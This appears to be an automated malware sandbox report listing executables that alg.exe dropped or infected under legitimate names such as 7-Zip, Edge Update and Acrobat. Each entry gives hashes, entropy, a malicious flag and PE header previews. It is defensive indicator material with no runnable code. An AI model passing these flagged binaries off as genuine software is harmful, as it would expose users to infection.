                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............O.@.O.@.O.@.$.A.O.@.$.A|O.@.7.A.O.@.7.A.O.@.7.A.O.@W6.A.O.@.$.A.O.@.$.A.O.@.$.A.O.@.O.@IN.@W6.A.O.@W6.@.O.@W6.A.O.@Rich.O.@........PE..d...@(.d.........."......n...........].........@......................................... .....................................................(............@..........................p.......................(...p,..@...............0............................text....l.......n.................. ..`.rdata..8z.......|...r..............@..@.data...P3..........................@....pdata.......@......................@..@.didat.......`......................@..._RDATA.......p......................@..@.rsrc...............................@..@.reloc...P.......@... ..............@...........................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1383936
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.338531367767514
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:f03cT++foSBWU2YxhkgHsqjnhMgeiCl7G0nehbGZpbD:83cK+foQWU2YnPbDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                    MD5:53167C25B2720934AE902AF10C541870
                                                                                                                                                                                                                                                                                                                                                    SHA1:F87D87D4DCCAB229707DB96BB072F7AF1015B244
                                                                                                                                                                                                                                                                                                                                                    SHA-256:D1FA839544BFEE55ADC8BE235B54E4C9E36BA993D40FC4ABEC2E0A3CAF0059F5
                                                                                                                                                                                                                                                                                                                                                    SHA-512:9998E8AF49790581338FD3E741CAE7A6DA28DFF3B9FC9B36EA666B61974D85F71D946D7E810D6462D87BB046261F23C284F88B69A9571C43F02950E4F2EAD45D
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............wU..wU..wU.tT..wU.rTg.wU..sT..wU..tT..wU..rT..wU.sT..wU.qT..wU.vT..wU..vUQ.wUK.~T..wUK..U..wUK.uT..wURich..wU........PE..L...B(.d............................p.............@.................................E,.......................................y..........H3...........................g..p....................g..........@....................x.......................text............................... ..`.rdata...z.......|..................@..@.data....'...........z..............@....didat..$...........................@....rsrc...H3.......4..................@..@.reloc...p.......`..................@...................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1221120
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.1389142663427725
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:EbrNRzB+NnXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kw:EbBRzBgnsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                    MD5:1028B3273289A43728AB4219C5D3789F
                                                                                                                                                                                                                                                                                                                                                    SHA1:8D78A7A5DF5F273DCFEF00F2DA787B74F71A48F6
                                                                                                                                                                                                                                                                                                                                                    SHA-256:2A85A3FFEA0A1D3550D3CCABF73F54121EBD7F3D50AF1997FD6F04F0EC47AAF8
                                                                                                                                                                                                                                                                                                                                                    SHA-512:064EA511CF7F548AF49C497D975D76E6935259015017CD7EAE3D968274A9FCE6DB5EEB398C45933022062C4FBA75B6C734A4CED2E6A551E9B1B2C31B0C6ACE3B
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,.B...B...B...A...B...G...B...F...B...G...B...F...B...A...B...C...B...C..B...G...B......B......B...@...B.Rich..B.........................PE..L...7(.d..........................................@.............................................................................(....`..X3..............................p...............................@...................<...@....................text............................... ..`.rdata...`.......b..................@..@.data........0......................@....didat.......P......................@....rsrc...X3...`...4..................@..@.reloc...`.......P...R..............@...................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):2168832
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.940561936119971
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:49152:ay53w24gQu3TPZ2psFkiSqwoz9Dmg27RnWGj:ayFQgZqsFki+oz9D527BWG
                                                                                                                                                                                                                                                                                                                                                    MD5:75BE69AA06765D045784F3413C7A1283
                                                                                                                                                                                                                                                                                                                                                    SHA1:0410E537C902C5B802A86CDC58269D571D3A1DB3
                                                                                                                                                                                                                                                                                                                                                    SHA-256:D012359799B056215ABB0E9AEC8EAE5399F580502103C78302CD9E8385E2B91B
                                                                                                                                                                                                                                                                                                                                                    SHA-512:C8F037498AAFB381CFB75884BC9C46A3B00E2D35082E2948B6805FCCFC07E1849FFFB6C8194AC4411741C14EDB15292BF0838F957FBBE474A0543FC4FB81368B
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......d..[ e.. e.. e..4...+e..4....e..B...1e..B...4e......-e..B....e..4...3e..4...!e..4...-e.. e...e....@.!e.. e(.ve......!e..Rich e..................PE..L....(.d............................ }............@..........................p!......&!......................................?..x....................................1..p....................1..........@...............H...T>..`....................text...*........................... ..`.rdata..............................@..@.data...,....P.......8..............@....didat..,....p.......B..............@....rsrc................D..............@..@.reloc.......p.......(..............@...................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Mozilla Maintenance Service\logs\maintenanceservice.log

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):3141
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.850184061793769
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:j5d85JEX8kkCRR0WtDr0WmIDVzVCmC8W0WqDjFgH0WlbD0W07DYMPE0WqNDUvkBA:VESR5Rm6w2q7J7qQ+znoD
                                                                                                                                                                                                                                                                                                                                                    MD5:2272A4746B3A2B07687B52C1167D37EA
                                                                                                                                                                                                                                                                                                                                                    SHA1:F1A55061E1D006561372B1A4539A2D36FE390647
                                                                                                                                                                                                                                                                                                                                                    SHA-256:E014C2A5A0E5FFE72E92E0336DE17ABDFFEC09B2C925A9F6F7BE63573F5799EE
                                                                                                                                                                                                                                                                                                                                                    SHA-512:3261A6339B67CD82CA5D838EA6BF9474B16E18EC029FCB80A605B94192459289F0B1A80438BA4B2A9C2A0CDB9220EE1A76436D015DA6136B46E634E6082E49FD
                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:2024-11-26 02:12:55-0500: Disabled unneeded token privilege: SeAssignPrimaryTokenPrivilege...2024-11-26 02:12:55-0500: Disabled unneeded token privilege: SeAuditPrivilege...2024-11-26 02:12:55-0500: Disabled unneeded token privilege: SeBackupPrivilege...2024-11-26 02:12:55-0500: Disabled unneeded token privilege: SeCreateGlobalPrivilege...2024-11-26 02:12:55-0500: Disabled unneeded token privilege: SeCreatePagefilePrivilege...2024-11-26 02:12:55-0500: Disabled unneeded token privilege: SeCreatePermanentPrivilege...2024-11-26 02:12:55-0500: Disabled unneeded token privilege: SeCreateSymbolicLinkPrivilege...2024-11-26 02:12:55-0500: Could not disable token privilege value: SeCreateTokenPrivilege. (1300)..2024-11-26 02:12:55-0500: Disabled unneeded token privilege: SeDebugPrivilege...2024-11-26 02:12:55-0500: Could not disable token privilege value: SeEnableDelegationPrivilege. (1300)..2024-11-26 02:12:55-0500: Disabled unneeded token privilege: SeImpersonatePrivilege...2024-11-26 02:12:5

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1356800
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.3478365352125055
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:IQVTZu0J4sqjnhMgeiCl7G0nehbGZpbD:nVTZulDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                    MD5:C00D0B962E95984AE63736DD9A6F990E
                                                                                                                                                                                                                                                                                                                                                    SHA1:73FC44314FFB66BA8AF89F180B3E1E073026633A
                                                                                                                                                                                                                                                                                                                                                    SHA-256:79B03D55F5C6D1E32307AB0722073A784A9FAF7CA920CE5A2E13BD2421F9C40D
                                                                                                                                                                                                                                                                                                                                                    SHA-512:E5AAF62F83B3676BF088279AF6661201A97E3276BEA5D30B4AB1C3DA17225740EE6A95EBB3EC710C9B4BC7649B9C952E355C56BB48361DC74086E940755D18D5
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......R...$.................@.............................P.......@.... .................................................h&..................`....................$..........................(....p..8............,...............................text...FQ.......R.................. ..`.rdata.......p.......V..............@..@.data...4#...`.......<..............@....pdata..`............J..............@..@.00cfg..(............d..............@..@.tls.................f..............@....voltbl.*............h.................._RDATA...............j..............@..@.rsrc................l..............@..@.reloc...P.......@...t..............@...........................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files\7-Zip\7z.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1683968
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.623138909448191
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:I+gkESfh4CoPsqjnhMgeiCl7G0nehbGZpbD:1gkE+SBDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                    MD5:FCB682D162897B070B33D3E5FB7ACDBC
                                                                                                                                                                                                                                                                                                                                                    SHA1:A9D197E31A75470863CD1EBF6BA995CB08475958
                                                                                                                                                                                                                                                                                                                                                    SHA-256:DB7834B5A07CAFA9DC64A44E427EE18FE841F63626C3A413461664E3D74EC95A
                                                                                                                                                                                                                                                                                                                                                    SHA-512:5349DCC83D8E7CEDB0D0C9739512259C1C9640E1EA845EE71C9B17BD5BCDEA339300408CAA9C09D1F189857E4A63746B07C38FE5923647CAD34020C678D6705B
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............xaX.xaX.xaX...X.xaX...X.xaX.x`XlxaX...X.xaX..eY.xaX...X.xaX`.bY.xaX...X.xaX...X.xaXRich.xaX........................PE..d....\.d.........."...........................@.............................. ...... ..... .....................................................x............@...q......................................................................0............................text...v........................... ..`.rdata..T...........................@..@.data....-..........................@....pdata...q...@...r..................@..@.rsrc................j..............@..@.reloc...P.......@...r..............@...........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files\7-Zip\7zFM.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1532416
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.096683679667781
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:hBpDRmi78gkPXlyo0GtjrgsqjnhMgeiCl7G0nehbGZpbD:zNRmi78gkPX4o0GtjQDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                    MD5:0843BF107ABD82D3F92C3B1CDE3940E6
                                                                                                                                                                                                                                                                                                                                                    SHA1:24068E0CD34575DF6DAFBDABA954025ECDF8E796
                                                                                                                                                                                                                                                                                                                                                    SHA-256:43811783A15199D17954BBAB6AC8129A6757A326669F444D197F527D9B80A310
                                                                                                                                                                                                                                                                                                                                                    SHA-512:E2D81AFA1A889B28FE5DDFB9C16B5B8CD1C21ACC651D91E901D855D30D753D100FC92D5AD7C35B3BFEFBD7F3C221EDE906B0169637CF2F812640A30EE95B0243
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........\..2..2..2.0.\..2..I..2..3..2..O..2..\.D.2...6..2.._..2..N..2..J..2.Rich.2.........................PE..d....\.d.........."......b...8......Pi........@......................................q.... .................................................P................... .......................................................................(.......@....................text....a.......b.................. ..`.rdata...i.......j...f..............@..@.data...............................@....pdata.. ...........................@..@.rsrc...............................@..@.reloc...............r..............@...........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files\7-Zip\7zG.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1282048
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.229076912040957
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:bLOS2oTPIXVPsqjnhMgeiCl7G0nehbGZpbD:F/ToDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                    MD5:96C3C0E4F3BFD19E719C75A3D2D32C10
                                                                                                                                                                                                                                                                                                                                                    SHA1:ACBDE3BC1F74344C7E8D146A9CFCFAD9667F6A40
                                                                                                                                                                                                                                                                                                                                                    SHA-256:5875CC7BDC07537FB0A7C0283EDD4F3E29EF254EB20EFC6AC6C195A206D70A68
                                                                                                                                                                                                                                                                                                                                                    SHA-512:6FD07C4EECAFA8EDBB898D3623FCB61E09E93B4AD100BC5CBFE0C84A484F3FACAB56C3D47400D02CC84020816CD514BE77FFA5C950AAFBBF5A7A101420009AC5
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;.VS.y8..y8..y8...C.jy8..y9..y8...E.}y8...V..y8.i.<.~y8...U.ky8...;.~y8...D.~y8...@.~y8.Rich.y8.........PE..d....\.d.........."......&..........."........@.....................................w..... ..............................................................d...........................................................................@...............................text...4$.......&.................. ..`.rdata..Ts...@...t...*..............@..@.data...83..........................@....pdata..............................@..@.rsrc....d.......f...:..............@..@.reloc..............................@...........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files\7-Zip\Uninstall.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1145344
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.0311944249469125
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:g19Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:g19sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                    MD5:5FB3749B61772E11B3349EA3B0E4E441
                                                                                                                                                                                                                                                                                                                                                    SHA1:9FAF1FDC8981690934601CA284FE8F2E7B128FFE
                                                                                                                                                                                                                                                                                                                                                    SHA-256:F8F36A408E784A9577234B99AD070BA05DA6B6C8AFBDF0F2812F391BDE8F9E9C
                                                                                                                                                                                                                                                                                                                                                    SHA-512:ED844B79B5B7BC08FB48C51849AB2A614CB6DD5ECB0CC2963944DE0C26A4956B12B2087E0943889895C6740656CD2230A868121CCEC5DBBB2B86E1B97094D214
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.6...X...X...X.x.R...X..V...X.x.\...X......X...Y.W.X......X.!.R...X...^...X.Rich..X.................PE..L...pN.d........../..........@......f!.......0....@........................................................................$9.......`...............................................................................0...............................text............................... ..`.rdata.......0......................@..@.data...X....@.......(..............@....rsrc....`...`...P...*..............@...........................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1222656
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.712035436751787
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:WRudzGXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:WAdzGsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                    MD5:FE05A927F23E1DC691B6633853AB3CC3
                                                                                                                                                                                                                                                                                                                                                    SHA1:6E11ADF82971946FD6501CD5D01C29890A551DCC
                                                                                                                                                                                                                                                                                                                                                    SHA-256:B0358CCE865603277C22414A831052483D6D8B802B3283175653C18DC65198A7
                                                                                                                                                                                                                                                                                                                                                    SHA-512:0803462846E916BD9EA6A31C4D16DBD38CDCB9DA45BE64A9C421FF3788F739604E693E8DDBF66A955AD6653CFAF5EEC66E2835EFB5901CF3DF9153CF677BF5E0
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........U...4.F.4.F.4.F.LEF.4.FE@.G.4.FE@.G.4.FE@.G.4.FE@.G.4.F._.G.4.F.4.F%4.FG@.G.4.FG@)F.4.F.4AF.4.FG@.G.4.FRich.4.F................PE..d......d.........."......6.....................@....................................A..... .....................................................|....P..h........9.....................p.......................(...P...8............P...............................text....4.......6.................. ..`.rdata..>....P.......:..............@..@.data...............................@....pdata...9.......:..................@..@.rsrc...h....P......................@..@.reloc..............................@...................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1457664
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.082163502055599
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:MvCXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:psqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                    MD5:82D4ECBF4FD8551D16327A0701220E1F
                                                                                                                                                                                                                                                                                                                                                    SHA1:0D1D792AD808ADDCF651511CEC33E57EBDCD2868
                                                                                                                                                                                                                                                                                                                                                    SHA-256:F25E72D0BE5AE037A64B2EAC0365C4B910C11D290F91524490B024E1730D4B74
                                                                                                                                                                                                                                                                                                                                                    SHA-512:C24C965C7A2FFF68670D49062BEC9730625CE7715445DCD215421406F33772A59AB94A57AEF479837CDA685FFE311CF48C584101562FA5BF2E7293256CB99AB2
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......]../...|...|...|B..}...|B..}...|...}...|..S|...|..}=..|..}...|..}...|..}...|..=|...|o..|...|B..}...|...|...|..}...|..Q|...|..9|...|..}...|Rich...|................PE..d......d.........."......H...........&.........@.......................................... .................................................@...,....@..........4......................T.......................(...@...8............`...............................text....G.......H.................. ..`.rdata.......`.......L..............@..@.data...............................@....pdata..4...........................@..@.CRT....@....0......................@..@.rsrc........@......................@..@.reloc...P...P...@..................@...................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrouserer.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1461248
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.468636563549038
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:d5zhM1XSEjsqjnhMgeiCl7G0nehbGZpbD:pMsKDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                    MD5:3036FDCC06CFF626337221F199BEBDF9
                                                                                                                                                                                                                                                                                                                                                    SHA1:F7FD3789BDBB22E381DBEAF6BFE6F4EA7AFF6141
                                                                                                                                                                                                                                                                                                                                                    SHA-256:18E6A62FCA5251402D74651C047FBBAC9FA08CE9E8F45CE08D1122A8F22E8648
                                                                                                                                                                                                                                                                                                                                                    SHA-512:E5373515DAC99C15BF882324E7454AF9C33FC8849E1803D9E6164B1FD566D59FCD1704770D9AA440D5D59E5E78473EB0D756F2B949F597FDE3016ECA3B54AB86
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.........<$.Rw.Rw.Rw...w..Rw5.Vv.Rw5.Qv.Rw5.Sv.Rw7.Sv.Rw..Vv.Rw..Tv.Rw..Sv..Rw.Sw..Rw5.Wv.Rw.t/w.Rw.t?w..Rw7.Wv.Rw7.Vv.Rw7.w.Rw..w.Rw7.Pv.RwRich.Rw........PE..d......d.........."..........z......@..........@.......................................... ................................................. A...................+......................T.......................(.......8............................................text............................... ..`.rdata..............................@..@.data....d...`...\...T..............@....pdata...+.......,..................@..@.rsrc............0..................@..@.reloc...P...0...@..................@...........................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):4151808
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.499791701491194
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:49152:ctuUC0nNc/RcYHCY9AWWnURqdHIEogMAYrukdUmSC+bXMZQU1QqpN755EDmg27RN:cjEIa4HIEWOc5OD527BWG
                                                                                                                                                                                                                                                                                                                                                    MD5:316E69E9269712E8847D951D4F9ED82C
                                                                                                                                                                                                                                                                                                                                                    SHA1:E0072BA1F34D674F747A89E56C59B3A4D6C4DE8C
                                                                                                                                                                                                                                                                                                                                                    SHA-256:4165AC1A17B1B4765933C95FD3892D4C3FF1BE205B2C09367A911C55F1A9E0FC
                                                                                                                                                                                                                                                                                                                                                    SHA-512:8F603200BF17986E83CF8E5BDE7D317CA2C0C069EAC20B635C84B2180189BA1275CC81F336F572E1654FCF4A7FB58F36B54BB55AB47D8D7FD1EC029DF282BF44
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$........x...............r.......r.......r.......v$.....>m......>m......>m.......r...............r..............<m......<m......<m&.......N.....<m......Rich............................PE..d...<..d.........."......:....................@............................. @.....fX@... .........................................0.%.......%......0)......p'.......................!.T.....................!.(....s .8............P......l.%......................text....8.......:.................. ..`.rdata.......P.......>..............@..@.data....D... &.......&.............@....pdata.......p'.......&.............@..@.didat........).......(.............@..._RDATA....... ).......(.............@..@.rsrc........0).......(.............@..@.reloc...@....6..0...*6.............@...................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):59941376
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.99936730764557
                                                                                                                                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:1572864:EQb5m2CYw2bheyHA2DiAVPNqCPiQwm9tqGWS15Vj9QVqd2+NAs:7XhwMhe6AABPiQwF6xQ22R
                                                                                                                                                                                                                                                                                                                                                    MD5:4A2A509549FB5AA4151A27D864883DE3
                                                                                                                                                                                                                                                                                                                                                    SHA1:214C338B7325BF4827094A012E39B42740173EEA
                                                                                                                                                                                                                                                                                                                                                    SHA-256:D1996F48B02120D2478034B69AE26920B8B574E5D44FB8903AC3CFFBA545F92B
                                                                                                                                                                                                                                                                                                                                                    SHA-512:861C11A6593EB3725DB7574CBC2AB8CC8145CF47D2C65EF87C101F23BA7481CA32FE5317B252076DE63F938596711C9C8F4F33C699E2916ABFBB1AEF265354E5
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
